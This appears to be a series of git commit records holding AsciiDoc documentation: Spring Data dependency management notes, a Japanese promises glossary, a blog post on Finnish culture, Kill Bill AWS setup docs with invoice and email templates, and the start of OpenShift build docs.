Properties\n\nIn both Maven and Gradle a couple of properties are used to define the versions of Spring Framework and Spring Data to use. For Spring Framework a plain version is used. For Spring Data we refer to the https:\/\/spring.io\/blog\/2020\/04\/30\/updates-to-spring-versions[calver revision] of the BOM. 
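As an illustration of how such properties feed the BOM imports described below, a minimal Maven sketch might look like this (the version values are placeholders; `spring-framework-bom` and `spring-data-bom` are the standard BOM artifact ids):

[source,xml]
----
<properties>
    <!-- plain Spring Framework version -->
    <spring.version>5.3.27</spring.version>
    <!-- calver revision of the Spring Data release train BOM -->
    <spring-data-bom.version>2021.2.12</spring-data-bom.version>
</properties>

<dependencyManagement>
    <dependencies>
        <dependency>
            <groupId>org.springframework</groupId>
            <artifactId>spring-framework-bom</artifactId>
            <version>${spring.version}</version>
            <type>pom</type>
            <scope>import</scope>
        </dependency>
        <dependency>
            <groupId>org.springframework.data</groupId>
            <artifactId>spring-data-bom</artifactId>
            <version>${spring-data-bom.version}</version>
            <type>pom</type>
            <scope>import</scope>
        </dependency>
    </dependencies>
</dependencyManagement>
----

The version values above would be filled in according to the release naming conventions that follow.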
The naming of Spring Data releases uses the following conventions:\n\n** `${calver-version}-M1` -> Milestones\n** \u2026\n** `${calver-version}-RC1` -> Release candidate\n** \u2026\n** `${calver-version}` -> GA version\n** `${calver-version}` -> Services release (bugfixes) for that release train\n\n== Maven\n\nThe `<dependencyManagement \/>` section declares dependencies to the BOMs for both Spring and Spring Data, using the `import` scope and `pom` type.\n\nThe standard `<dependencies \/>` section can now list Spring Framework and Spring Data dependencies without declaring a version and still be sure all libraries are in matching versions.\n\nNote, that we don't declare a Spring Framework dependency here. The import of the Spring Framework BOM nonetheless makes sure we control the version of all transitive Spring Framework dependencies pulled in by the Spring Data modules.\n\n== Gradle\n\nGradle does not support Maven BOMs (Bill of Materials) out of the box, so the first thing to do is important the\nhttps:\/\/github.com\/spring-gradle-plugins\/dependency-management-plugin[dependency management plugin]. This example is based on Java,\nbut if you need a different language plugin (e.g. Kotlin), you can do so.\n\nThe `dependencyManagement` section can be used to import the Spring Framework BOM and Spring Data BOM.\n\nThe standard `dependencies` section can now list Spring and Spring Data dependencies without declaring a version and still\nbe sure all libraries are align with each other.\n\nNote how you don't declare a Spring Framework dependency. Nevertheless, the dependency management plugin and the Spring Framework BOM\nensures you control the version of all transitive Spring Framework dependencies pulled in by Spring Data.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6e05975fceeae6ac0625d3248d0e1881e54a8e37","subject":"chore(Golossary): promise\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u306e\u8868\u793a\u3092\u4fee\u6b63","message":"chore(Golossary): promise\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u306e\u8868\u793a\u3092\u4fee\u6b63\n","repos":"cqricky\/promises-book,lidasong2014\/promises-book,tangjinzhou\/promises-book,liubin\/promises-book,azu\/promises-book,liyunsheng\/promises-book,purepennons\/promises-book,tangjinzhou\/promises-book,azu\/promises-book,wangwei1237\/promises-book,wangwei1237\/promises-book,cqricky\/promises-book,azu\/promises-book,lidasong2014\/promises-book,mzbac\/promises-book,liyunsheng\/promises-book,lidasong2014\/promises-book,mzbac\/promises-book,dieface\/promises-book,sunfurong\/promise,liubin\/promises-book,cqricky\/promises-book,wenber\/promises-book,sunfurong\/promise,purepennons\/promises-book,wenber\/promises-book,charlenopires\/promises-book,mzbac\/promises-book,dieface\/promises-book,sunfurong\/promise,oToUC\/promises-book,genie88\/promises-book,genie88\/promises-book,genie88\/promises-book,azu\/promises-book,xifeiwu\/promises-book,xifeiwu\/promises-book,liyunsheng\/promises-book,charlenopires\/promises-book,dieface\/promises-book,purepennons\/promises-book,xifeiwu\/promises-book,oToUC\/promises-book,wangwei1237\/promises-book,wenber\/promises-book,oToUC\/promises-book,liubin\/promises-book,tangjinzhou\/promises-book,charlenopires\/promises-book","old_file":"Appendix-Glossary\/readme.adoc","new_file":"Appendix-Glossary\/readme.adoc","new_contents":"[[promise-glossary]]\n= \u7528\u8a9e\u96c6\n\nPromises::\n 
\u30d7\u30ed\u30df\u30b9\u3068\u3044\u3046\u4ed5\u69d8\u305d\u306e\u3082\u306e\npromise\u30aa\u30d6\u30b8\u30a7\u30af\u30c8::\n \u30d7\u30ed\u30df\u30b9\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u3001`Promise`\u306e\u30a4\u30f3\u30b9\u30bf\u30f3\u30b9\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u306e\u4e8b\n[[es6-promises]]\nES6 Promises::\n http:\/\/people.mozilla.org\/%7Ejorendorff\/es6-draft.html#sec-operations-on-promise-objects[ECMAScript 6th Edition] \u3092\u660e\u793a\u7684\u306b\u793a\u3059\u5834\u5408\u306bprefix\u3068\u3057\u3066 _ES6_ \u3092\u3064\u3051\u308b\n[[promises-aplus]]\nPromises\/A+::\n http:\/\/promises-aplus.github.io\/promises-spec\/[Promises\/A+]\u306e\u4e8b\u3002\n ES6 Promises\u306e\u524d\u8eab\u3068\u306a\u3063\u305f\u30b3\u30df\u30e5\u30cb\u30c6\u30a3\u30d9\u30fc\u30b9\u306e\u4ed5\u69d8\u3067\u3042\u308a\u3001ES6 Promises\u3068\u306f\u591a\u304f\u306e\u90e8\u5206\u304c\u5171\u901a\u3057\u3066\u3044\u308b\u3002\n[[Thenable]]\nThenable::\n Promise\u30e9\u30a4\u30af\u306a\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u306e\u4e8b\u3002\n `.then`\u3068\u3044\u3046\u30e1\u30bd\u30c3\u30c9\u3092\u6301\u3064\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u3002\n[[promise-chain]]\npromise chain::\n promise\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u3092`then`\u3084`catch`\u306e\u30e1\u30bd\u30c3\u30c9\u30c1\u30a7\u30fc\u30f3\u3067\u3064\u306a\u3052\u305f\u3082\u306e\u3002\n \u3053\u306e\u7528\u8a9e\u306f\u66f8\u7c4d\u4e2d\u306e\u3082\u306e\u3067\u3042\u308a\u3001<<es6-promises,ES6 Promises>>\u3067\u5b9a\u3081\u3089\u308c\u305f\u7528\u8a9e\u3067\u306f\u3042\u308a\u307e\u305b\u3093\u3002","old_contents":"[[promise-glossary]]\n= \u7528\u8a9e\u96c6\n\nPromises::\n \u30d7\u30ed\u30df\u30b9\u3068\u3044\u3046\u4ed5\u69d8\u305d\u306e\u3082\u306e\nPromise::\n \u30d7\u30ed\u30df\u30b9\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u3001\u30a4\u30f3\u30b9\u30bf\u30f3\u30b9\n[[es6-promises]]\nES6 Promises::\n http:\/\/people.mozilla.org\/%7Ejorendorff\/es6-draft.html#sec-operations-on-promise-objects[ECMAScript 6th Edition] \u3092\u660e\u793a\u7684\u306b\u793a\u3059\u5834\u5408\u306bprefix\u3068\u3057\u3066 _ES6_ \u3092\u3064\u3051\u308b\n[[promises-aplus]]\nPromises\/A+::\n http:\/\/promises-aplus.github.io\/promises-spec\/[Promises\/A+]\u306e\u4e8b\u3002\n ES6 Promises\u306e\u30d9\u30fc\u30b9\u3068\u306a\u3063\u305f\u30b3\u30df\u30e5\u30cb\u30c6\u30a3\u30d9\u30fc\u30b9\u306e\u4ed5\u69d8\u3067\u3042\u308a\u3001ES6 Promises\u3068\u306f\u591a\u304f\u306e\u90e8\u5206\u304c\u5171\u901a\u3057\u3066\u3044\u308b\u3002\n[[Thenable]]\nThenable::\n Promise\u30e9\u30a4\u30af\u306a\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u306e\u4e8b\u3002\n `.then`\u3068\u3044\u3046\u30e1\u30bd\u30c3\u30c9\u3092\u6301\u3064\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u3002\n[[promise-chain]]\npromise chain::\n promise\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u3092`then`\u3084`catch`\u306e\u30e1\u30bd\u30c3\u30c9\u30c1\u30a7\u30fc\u30f3\u3067\u3064\u306a\u3052\u305f\u3082\u306e\u3002\n \u3053\u306e\u7528\u8a9e\u306f\u66f8\u7c4d\u4e2d\u306e\u3082\u306e\u3067\u3042\u308a\u3001<<es6-promises,ES6 Promises>>\u3067\u5b9a\u3081\u3089\u308c\u305f\u7528\u8a9e\u3067\u306f\u3042\u308a\u307e\u305b\u3093\u3002","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"9093a1cb22e49337d05585c145e9b29b322e7a24","subject":"Update 2015-09-08-Finnish-Culture-101.adoc","message":"Update 
2015-09-08-Finnish-Culture-101.adoc","repos":"TeksInHelsinki\/en,TeksInHelsinki\/en,TeksInHelsinki\/en","old_file":"_posts\/2015-09-08-Finnish-Culture-101.adoc","new_file":"_posts\/2015-09-08-Finnish-Culture-101.adoc","new_contents":"= Finnish Culture 101\n:hp-tags: Culture, sisu, sauna, nature, Kalevala\n:hp-image: https:\/\/TeksInHelsinki.github.com\/images\/article_covers\/4.bases_culture.jpg\n:published_at: 2015-09-08\n\nThis post aims at enlightening you on some of the main aspects of Finnish culture!\n\n=== Sisu\n\n\"Sisu\" is the Finnish mindset. Basically, sisu means determination, bravery, guts, resilience & perseverance. +\nIt is sisu that allows Finnish people to go through long winters without complaining, and it is what gave them the reputation of being at their best when the circumstances are at their worst. +\nAccording to the French Wikipedia, \"The sisu is the heart of the Finnish soul. It is the patient stubbornness which allows the Finnish people to face all the situations and to complete their goals\".\n\n=== Sauna\n\nSaunas are EVERYWHERE in Finland! Most flats and houses have one (usually connected to their bathrooms), except for some small student flats, in which case there's probably a common sauna in the building anyway. There's about 3 million saunas in Finland, for 5 million inhabitants, which means that the whole population of Finland could be sitting inside a sauna at the same time!\n\nSaunas in Finland are really hot, and can be a bit hardcore to get used to. But when you go back to your country, you'll find all the public saunas way too cold :) Finnish saunas are usually between 60\u00b0C and 80\u00b0C (140\u00b0F and 175\u00b0F), I think. +\nI once made the mistake of telling a Finnish person I thought his sauna was not hot enough. On the next day he heated it up so much I couldn't even sit on the burning wood benches.\n\nSometimes, birch branches (named vihta) are used to whip people in the sauna, in order to make their blood circulate better. People can also jump in snow or swim in a frozen lake in the middle of winter. Whatever floats your boat, right? +\n\nSauna is very healthy for numerous reasons: it helps remove nicotine from one's blood if they want to stop smoking, it kills lice and bedbugs, it stimulates blood circulation and the immune system, and tons of other cool stuff! \n\nOne last thing: you have to be naked in saunas. Yup. Swimsuits are mostly forbidden, and towels around your hips can seem weird as you're gonna be the only one wearing them. Because of this, most public saunas are not gender neutral, although it's quite common to have mixed saunas with friends and family.\n\nlink:http:\/\/satwcomic.com\/sauna-time[A little comic to give you a better idea of sauna]\n\n=== Nature\n\nFinns, more than most western peoples, are extremely close to nature... and you can see proof of this everywhere! There's a lot of nature in towns (trees, parks, undisturbed wild areas etc.), Finnish design is often inspired by nature (cf. Alvar Aalto), and they are very conscious about environment issues.\n\nThis love of nature is well represented by the national anthem, \"Maamme\" (Our Land), which is, unlike most national anthems, a war chant. Indeed, it only deals with how beautiful Finland's nature is! 
+\nThe Finnish flag also reflects this: the white represents the snow, and the blue represents the lakes.\n\nLast but not least, _jokamiehenoikeus_ is a Finnish word representing the rule that you can enjoy the nature, as long as you respect it, while ignoring the concepts of ownership. It means that you can go on privately owned lands, as long as you don't bother the landlords - more precisely, as long as you don't hear each other. This is one of the reasons why camping is authorized everywhere in Finland.\n\n\n=== The Kalevala\n\nThe Kalevala is the national epic of Finland, so it deals with Finnish mythology. Finland is _not_ part of Scandinavia, hence its people never worshipped Thor, Odin, Loki & co.\n\nThe Kalevala was written in the 19th century by Elias L\u00f6nnrot, who travelled throughout Finland to acquire traditional songs from bards, before ordering them so that they form a logical(ish) story. +\nFor instance, the creation of the world, according to Finnish mythology, went as follows: a woman (Ilmatar, the air's daughter) is in the sea, a duck rests on her knee to lay its eggs but she accidentally breaks them and a part of the shell becomes the earth, the other becomes the sky, the yolk becomes the sun and the white is the moon. Why not, eh? +\nThat's only a part of the first \"song\" of the Kalevala, out of 50 in total. The others are epic stories about various characters, including a**holes harassing girls so much that they kill themselves (ever heard of V\u00e4in\u00e4m\u00f6inen?), sorcerers and healers, badass smiths (Ilmarinen FTW!) etc.\n\nThe Kalevala is very present in Finnish culture, even though now most people don't believe in the old gods anymore. You can see paintings of V\u00e4in\u00e4m\u00f6inen's adventures in museums, and he is also on Finnish memes - I'll put some in my articles later. +\nThe book also greatly inspired Tolkien when he wrote The Lord of the Rings, just as the Finnish language inspired him to create the Elvish one.\n\nIf you like to read epic adventures and fantasy, you should definitely read this book! I'm reading the French translation, which is very good, but I don't know about the other translations. It is surprisingly easy to read, and the stories are captivating!\n\nNOTE: Article written by link:https:\/\/github.com\/Lokenstein[Coline]\n\nNOTE: Sources : my memories from Finland, the Kalevala, the French and English Wikipedia pages of Sisu, and the Internet ","old_contents":"= Finnish Culture 101\n:hp-tags: Culture, sisu, sauna, nature, Kalevala\n:hp-image: https:\/\/TeksInHelsinki.github.com\/images\/article_covers\/4.bases_culture.jpg\n:published_at: 2015-03-05\n\nThis post aims at enlightening you on some of the main aspects of Finnish culture!\n\n=== Sisu\n\n\"Sisu\" is the Finnish mindset. Basically, sisu means determination, bravery, guts, resilience & perseverance. +\nIt is sisu that allows Finnish people to go through long winters without complaining, and it is what gave them the reputation of being at their best when the circumstances are at their worst. +\nAccording to the French Wikipedia, \"The sisu is the heart of the Finnish soul. It is the patient stubbornness which allows the Finnish people to face all the situations and to complete their goals\".\n\n=== Sauna\n\nSaunas are EVERYWHERE in Finland! Most flats and houses have one (usually connected to their bathrooms), except for some small student flats, in which case there's probably a common sauna in the building anyway. 
There's about 3 million saunas in Finland, for 5 million inhabitants, which means that the whole population of Finland could be sitting inside a sauna at the same time!\n\nSaunas in Finland are really hot, and can be a bit hardcore to get used to. But when you go back to your country, you'll find all the public saunas way too cold :) Finnish saunas are usually between 60\u00b0C and 80\u00b0C (140\u00b0F and 175\u00b0F), I think. +\nI once made the mistake of telling a Finnish person I thought his sauna was not hot enough. On the next day he heated it up so much I couldn't even sit on the burning wood benches.\n\nSometimes, birch branches (named vihta) are used to whip people in the sauna, in order to make their blood circulate better. People can also jump in snow or swim in a frozen lake in the middle of winter. Whatever floats your boat, right? +\n\nSauna is very healthy for numerous reasons: it helps remove nicotine from one's blood if they want to stop smoking, it kills lice and bedbugs, it stimulates blood circulation and the immune system, and tons of other cool stuff! \n\nOne last thing: you have to be naked in saunas. Yup. Swimsuits are mostly forbidden, and towels around your hips can seem weird as you're gonna be the only one wearing them. Because of this, most public saunas are not gender neutral, although it's quite common to have mixed saunas with friends and family.\n\nlink:http:\/\/satwcomic.com\/sauna-time[A little comic to give you a better idea of sauna]\n\n=== Nature\n\nFinns, more than most western peoples, are extremely close to nature... and you can see proof of this everywhere! There's a lot of nature in towns (trees, parks, undisturbed wild areas etc.), Finnish design is often inspired by nature (cf. Alvar Aalto), and they are very conscious about environment issues.\n\nThis love of nature is well represented by the national anthem, \"Maamme\" (Our Land), which is, unlike most national anthems, a war chant. Indeed, it only deals with how beautiful Finland's nature is! +\nThe Finnish flag also reflects this: the white represents the snow, and the blue represents the lakes.\n\nLast but not least, _jokamiehenoikeus_ is a Finnish word representing the rule that you can enjoy the nature, as long as you respect it, while ignoring the concepts of ownership. It means that you can go on privately owned lands, as long as you don't bother the landlords - more precisely, as long as you don't hear each other. This is one of the reasons why camping is authorized everywhere in Finland.\n\n\n=== The Kalevala\n\nThe Kalevala is the national epic of Finland, so it deals with Finnish mythology. Finland is _not_ part of Scandinavia, hence its people never worshipped Thor, Odin, Loki & co.\n\nThe Kalevala was written in the 19th century by Elias L\u00f6nnrot, who travelled throughout Finland to acquire traditional songs from bards, before ordering them so that they form a logical(ish) story. +\nFor instance, the creation of the world, according to Finnish mythology, went as follows: a woman (Ilmatar, the air's daughter) is in the sea, a duck rests on her knee to lay its eggs but she accidentally breaks them and a part of the shell becomes the earth, the other becomes the sky, the yolk becomes the sun and the white is the moon. Why not, eh? +\nThat's only a part of the first \"song\" of the Kalevala, out of 50 in total. 
The others are epic stories about various characters, including a**holes harassing girls so much that they kill themselves (ever heard of V\u00e4in\u00e4m\u00f6inen?), sorcerers and healers, badass smiths (Ilmarinen FTW!) etc.\n\nThe Kalevala is very present in Finnish culture, even though now most people don't believe in the old gods anymore. You can see paintings of V\u00e4in\u00e4m\u00f6inen's adventures in museums, and he is also on Finnish memes - I'll put some in my articles later. +\nThe book also greatly inspired Tolkien when he wrote The Lord of the Rings, just as the Finnish language inspired him to create the Elvish one.\n\nIf you like to read epic adventures and fantasy, you should definitely read this book! I'm reading the French translation, which is very good, but I don't know about the other translations. It is surprisingly easy to read, and the stories are captivating!\n\nNOTE: Article written by link:https:\/\/github.com\/Lokenstein[Coline]\n\nNOTE: Sources : my memories from Finland, the Kalevala, the French and English Wikipedia pages of Sisu, and the Internet ","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"aea7f0e9755ca8a1c4958b194215e65aaca0f5d6","subject":"aws: updates","message":"aws: updates\n\nSigned-off-by: Pierre-Alexandre Meyer <ff019a5748a52b5641624af88a54a2f0e46a9fb5@mouraf.org>\n","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/tutorials\/aws.adoc","new_file":"userguide\/tutorials\/aws.adoc","new_contents":"= Kill Bill on AWS\n\n++++\n<div class=\"col-sm-8\" style=\"max-width: 100%\">\n <div id=\"cards\" class=\"card text-center\">\n <div class=\"card-group\">\n <div class=\"card\">\n <div class=\"card-body\">\n <h5 class=\"card-title\">Single-Tier single AMI with MariaDB<\/h5>\n <p class=\"card-text\">Perfect for prototyping and test environments<\/p>\n <a href=\"https:\/\/aws.amazon.com\/marketplace\/pp\/B083LYVG9H?ref=_ptnr_doclanding_\" onclick=\"getOutboundLink('https:\/\/aws.amazon.com\/marketplace\/pp\/B083LYVG9H?ref=_ptnr_doclanding_'); return false;\" class=\"btn btn-primary\">Launch<\/a>\n <\/div>\n <\/div>\n <div class=\"card\">\n <div class=\"card-body\">\n <h5 class=\"card-title\">Multi-Tier CloudFormation with Amazon Aurora<\/h5>\n <p class=\"card-text\">Production ready setup in minutes <strong>(most popular)<\/strong><\/p>\n <a href=\"https:\/\/aws.amazon.com\/marketplace\/pp\/prodview-nochv5omslmds?ref=_ptnr_doc_\" onclick=\"getOutboundLink('https:\/\/aws.amazon.com\/marketplace\/pp\/prodview-nochv5omslmds?ref=_ptnr_doclanding_'); return false;\" class=\"btn btn-primary\">Launch<\/a>\n <\/div>\n <\/div>\n <div class=\"card\">\n <div class=\"card-body\">\n <h5 class=\"card-title\">Multi-Tier single AMI with external database<\/h5>\n <p class=\"card-text\">Fully customizable production environment (advanced users)<\/p>\n <a href=\"https:\/\/aws.amazon.com\/marketplace\/pp\/B083LYVG9H?ref=_ptnr_doclanding_\" onclick=\"getOutboundLink('https:\/\/aws.amazon.com\/marketplace\/pp\/B083LYVG9H?ref=_ptnr_doclanding_'); return false;\" class=\"btn btn-primary\">Launch<\/a>\n <\/div>\n <\/div>\n <\/div>\n <\/div>\n<\/div>\n++++\n\n++++\n<p>\n <span class=\"badge badge-primary\">New!<\/span> AWS deployments now come with free initial Slack support, register <a href=\"https:\/\/killbill.io\/aws\" onclick=\"getOutboundLink('https:\/\/killbill.io\/aws'); return false;\">here<\/a>.\n<\/p>\n++++\n\n== Overview\n\nThe core development team publishes official images on the AWS Marketplace, which allow you 
to quickly get started with Kill Bill in the cloud. There are several strategies and AMIs to target different use cases:\n\n1. Single AMI Deployments: Both Kill Bill server and KAUI, the administrative UI, run in the same EC2 instance.\n2. Cloud Formation Deployments: The Cloud Formation Template will deploy auto-scaling groups of instances for Kill Bill server and KAUI, and create an RDS database instance. There is a separate AMI for Kill Bill server and for KAUI.\n\nSo, which one to choose?\n\n**Cloud Formation Deployments** offer better integration with the rest of the AWS ecosystem, by relying on auto-scaling groups to scale both Kill Bill and KAUI instances independently and also by relying on CloudWatch for metrics. They also offer a **1-click** button deployment for the whole stack, incl. the required database. Cloud Formation Deployments are a good option to get a production-ready deployment with minimal effort. Please refer to the https:\/\/docs.killbill.io\/latest\/aws-cf.html[specifics of Cloud Formation Deployments].\n\n**Single AMI Deployments** come in 2 flavors:\n\n* `Single-Tier`: In order to quickly get started, we provide an AMI that can be launched with a **1-click** button. Both Kill Bill server, KAUI and the database run on **one node**, so while this is very convenient to get started, this is often a poor option for production deployments.\n* `Multi-Tier`: In this mode, there is also one single AMI for both Kill Bill server and KAUI, but the deployment will rely on an external database. Typically such deployments will also rely on at least 2 instances for running the Kill Bill stack to provide the right level of redundancy and zero downtime upgrade deployments.\n\nThe Single AMI Deployments are a great way to easily get started through the `Single-Tier` option, but they typically require a bit more setup for production deployments. Please refer to the https:\/\/docs.killbill.io\/latest\/aws-single-ami.html[specifics of the Single AMI Deployments].\n\nThe rest of this documentation focuses on configurations that apply to both types of deployments.\n\n== Default configuration\n\nEither installation method comes with a default configuration to get you started.\n\nA few plugins are also pre-configured, but not installed: all you need to do is head to the Kaui KPM page and select the plugin(s) of your choice to install.\n\n=== Invoice templates\n\nKill Bill invoices can be rendered as HTML using our https:\/\/killbill.github.io\/slate\/#invoice-render-an-invoice-as-html[render HTML invoice API]. This can be useful for instance to expose the invoices directly to your customer on the billing section of your website.\n\nThe default template looks like this:\n\nimage:https:\/\/github.com\/killbill\/killbill-docs\/raw\/v3\/userguide\/assets\/aws\/invoice_html.png[align=center]\n\nThe text can be customized and translated. 
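To see the rendered output for one of your invoices, a call along these lines should work (assuming the default `bob`/`lazar` tenant credentials used elsewhere in this guide; `<invoiceId>` is a placeholder):

```
curl -v \
-u admin:password \
-H "X-Killbill-ApiKey:bob" \
-H "X-Killbill-ApiSecret:lazar" \
'http://127.0.0.1:8080/1.0/kb/invoices/<invoiceId>/html'
```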
To customize the text, create a file `InvoiceTranslation_en_US.properties` with the following content (adjust the values on the right side of the `=` sign as needed):\n\n[source,properties]\n----\ncompanyName=Acme Corporation\ncompanyAddress=57 Academy Drive\ncompanyCityProvincePostalCode=Oak Creek, WI 53154\ncompanyCountry=US\ninvoiceTitle=Invoice\ninvoiceDate=Invoice Date: \ninvoiceAmount=Total: \ninvoiceAmountPaid=Amount Paid: \ninvoiceBalance=Balance: \ninvoiceItemServicePeriod=Service Period\ninvoiceItemDescription=Plan\ninvoiceItemAmount=Amount\n----\n\nand upload it to Kaui by going to your admin tenant page (`InvoiceTranslation` tab):\n\nimage:https:\/\/github.com\/killbill\/killbill-docs\/raw\/v3\/userguide\/assets\/aws\/invoice_html_config.png[align=center]\n\nAdditional languages can be uploaded for each locale (e.g. specify `fr_FR` for French).\n\nMore details are available in our https:\/\/docs.killbill.io\/latest\/internationalization.html[Internationalization] userguide, including how to fully customize the template.\n\n=== Email notifications\n\n==== SMTP configuration\n\nThe plugin needs to be configured with an SMTP server to be able to send emails. The easiest way to set it up on AWS is with https:\/\/docs.aws.amazon.com\/ses\/latest\/DeveloperGuide\/send-email-smtp.html[SES].\n\nOnce you have obtained your credentials, update the plugin configuration:\n\nimage:https:\/\/github.com\/killbill\/killbill-docs\/raw\/v3\/userguide\/assets\/aws\/email-notifications_config.png[align=center]\n\n==== Templates\n\nThe plugin comes with a preconfigured set of email templates.\n\nFor instance, this is the email which will be sent when an invoice is generated:\n\nimage:https:\/\/github.com\/killbill\/killbill-docs\/raw\/v3\/userguide\/assets\/aws\/invoice_email.png[align=center]\n\nThis is what the user will receive when a subscription is cancelled:\n\nimage:https:\/\/github.com\/killbill\/killbill-docs\/raw\/v3\/userguide\/assets\/aws\/cancellation_email.png[align=center]\n\nThe default set of translation strings is:\n\n[source,properties]\n----\nupcomingInvoiceAdditionalMessage=Here's a preview of your upcoming invoice\nupcomingInvoiceSubject=Your upcoming invoice\ninvoiceCreationAdditionalMessage=Thank you for your prompt payment!\ninvoiceCreationSubject=Your recent invoice\nsuccessfulPaymentAdditionalMessage=Thank you for your recent payment!\nsuccessfulPaymentSubject=Your recent payment\nfailedPaymentAdditionalMessage=We were not able to process your payment!\nfailedPaymentSubject=Your recent payment\npaymentRefundAdditionalMessage=Your refund has been processed!\npaymentRefundSubject=Your recent payment\ncompanyName=Acme Corporation\ncompanyAddress=57 Academy Drive\ncompanyCityProvincePostalCode=Oak Creek, WI 53154\ncompanyCountry=US\ninvoicePrefix=INV# \ninvoiceTitle=Invoice\ninvoiceDate=Invoice Date: \ninvoiceAmount=Total: \ninvoiceAmountPaid=Amount Paid: \ninvoiceBalance=Balance: \ninvoiceItemServicePeriod=Service Period\ninvoiceItemDescription=Plan\ninvoiceItemAmount=Amount\npaymentTitle=Payment\npaymentDate=Payment Date: \npaymentAmount=Total: \nsubscriptionCancellationRequestedAdditionalMessage=The following subscription will be cancelled\nsubscriptionCancellationRequestedSubject=Your subscription will be cancelled\nsubscriptionCancellationEffectiveAdditionalMessage=The following subscription has been cancelled\nsubscriptionCancellationEffectiveSubject=Your subscription has been cancelled\nsubscriptionTitle=Subscription\nsubscriptionEndDate=End Date: \nsusbscriptionPlan=Plan: 
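# The strings above can be localized in the same way as the invoice
# translations earlier in this guide: per-locale bundles with the same keys
# (a hypothetical French bundle would set e.g. invoiceTitle=Facture).
# See the plugin documentation linked below for how to upload overrides.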
\n==== Templates\n\nThe plugin comes with a preconfigured set of email templates.\n\nFor instance, this is the email which will be sent when an invoice is generated:\n\nimage:https:\/\/github.com\/killbill\/killbill-docs\/raw\/v3\/userguide\/assets\/aws\/invoice_email.png[align=center]\n\nThis is what the user will receive when a subscription is cancelled:\n\nimage:https:\/\/github.com\/killbill\/killbill-docs\/raw\/v3\/userguide\/assets\/aws\/cancellation_email.png[align=center]\n\nThe default set of translation strings is:\n\n[source,properties]\n----\nupcomingInvoiceAdditionalMessage=Here's a preview of your upcoming invoice\nupcomingInvoiceSubject=Your upcoming invoice\ninvoiceCreationAdditionalMessage=Thank you for your prompt payment!\ninvoiceCreationSubject=Your recent invoice\nsuccessfulPaymentAdditionalMessage=Thank you for your recent payment!\nsuccessfulPaymentSubject=Your recent payment\nfailedPaymentAdditionalMessage=We were not able to process your payment!\nfailedPaymentSubject=Your recent payment\npaymentRefundAdditionalMessage=Your refund has been processed!\npaymentRefundSubject=Your recent payment\ncompanyName=Acme Corporation\ncompanyAddress=57 Academy Drive\ncompanyCityProvincePostalCode=Oak Creek, WI 53154\ncompanyCountry=US\ninvoicePrefix=INV# \ninvoiceTitle=Invoice\ninvoiceDate=Invoice Date: \ninvoiceAmount=Total: \ninvoiceAmountPaid=Amount Paid: \ninvoiceBalance=Balance: \ninvoiceItemServicePeriod=Service Period\ninvoiceItemDescription=Plan\ninvoiceItemAmount=Amount\npaymentTitle=Payment\npaymentDate=Payment Date: \npaymentAmount=Total: \nsubscriptionCancellationRequestedAdditionalMessage=The following subscription will be cancelled\nsubscriptionCancellationRequestedSubject=Your subscription will be cancelled\nsubscriptionCancellationEffectiveAdditionalMessage=The following subscription has been cancelled\nsubscriptionCancellationEffectiveSubject=Your subscription has been cancelled\nsubscriptionTitle=Subscription\nsubscriptionEndDate=End Date: \nsusbscriptionPlan=Plan: \n----\n\nMore details on how to update these strings and the HTML templates are available in the https:\/\/github.com\/killbill\/killbill-email-notifications-plugin[plugin] documentation.\n\n=== Analytics plugin\n\nThe plugin comes with a few pre-configured reports:\n\n* `Subscriptions creation`: counts the number of subscriptions created per day (effective on that day, i.e., pending subscriptions are ignored). Refreshed every hour. The name of the report is `report_new_subscriptions_daily`.\n* `Effective cancellations`: counts the number of subscriptions canceled per day (only effective cancellations are taken into account: end-of-term cancellations are ignored, for instance). Refreshed every hour. The name of the report is `report_cancellations_daily`.\n* `Overdue accounts`: counts the number of overdue accounts per day (defined as having a negative balance, i.e. owing money). Refreshed once a day at 6am GMT. The name of the report is `report_overdue_accounts_daily`.\n\nIn order to make these reports active, they must be enabled at a per-tenant level. Assuming a `bob\/lazar` tenant, we can activate a report using the following command -- e.g. report=`report_cancellations_daily`:\n\n```\n#\n# Activate report report_cancellations_daily for tenant bob\/lazar:\n#\ncurl -v \\\n-X PUT \\\n-u admin:password \\\n-H \"X-Killbill-ApiKey:bob\" \\\n-H \"X-Killbill-ApiSecret:lazar\" \\\n-H 'Content-Type: application\/json' \\\n-d '{}' \\\n'http:\/\/127.0.0.1:8080\/plugins\/killbill-analytics\/reports\/report_cancellations_daily?shouldRefresh=true'\n```\n\nCustom reports can be added by following our https:\/\/docs.killbill.io\/latest\/userguide_analytics.html[Analytics guide].\n\nimage:https:\/\/github.com\/killbill\/killbill-docs\/raw\/v3\/userguide\/assets\/aws\/analytics_reports.png[align=center]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"}
{"commit":"6e2532f8ed83b281f628bce291e543538d007454","subject":"Reword sentence","message":"Reword sentence\n","repos":"xiaoping378\/openshift-docs,xiaoping378\/openshift-docs,xiaoping378\/openshift-docs","old_file":"dev_guide\/builds.adoc","new_file":"dev_guide\/builds.adoc","new_contents":"= Builds\n{product-author}\n{product-version}\n:data-uri:\n:icons:\n:experimental:\n:toc: macro\n:toc-title:\n:prewrap!:\n\ntoc::[]\n\n== Overview\nA link:..\/architecture\/core_concepts\/builds_and_image_streams.html#builds[build] is the process of creating runnable images to be used on OpenShift. There are three build strategies:\n\n- link:..\/architecture\/core_concepts\/builds_and_image_streams.html#source-build[Source-To-Image (S2I)]\n- link:..\/architecture\/core_concepts\/builds_and_image_streams.html#docker-build[Docker]\n- link:..\/architecture\/core_concepts\/builds_and_image_streams.html#custom-build[Custom]\n\n[[defining-a-buildconfig]]\n\n== Defining a BuildConfig\n\nA build configuration describes a single build definition and a set of link:#build-triggers[triggers] for when a new build should be created.\n\nA 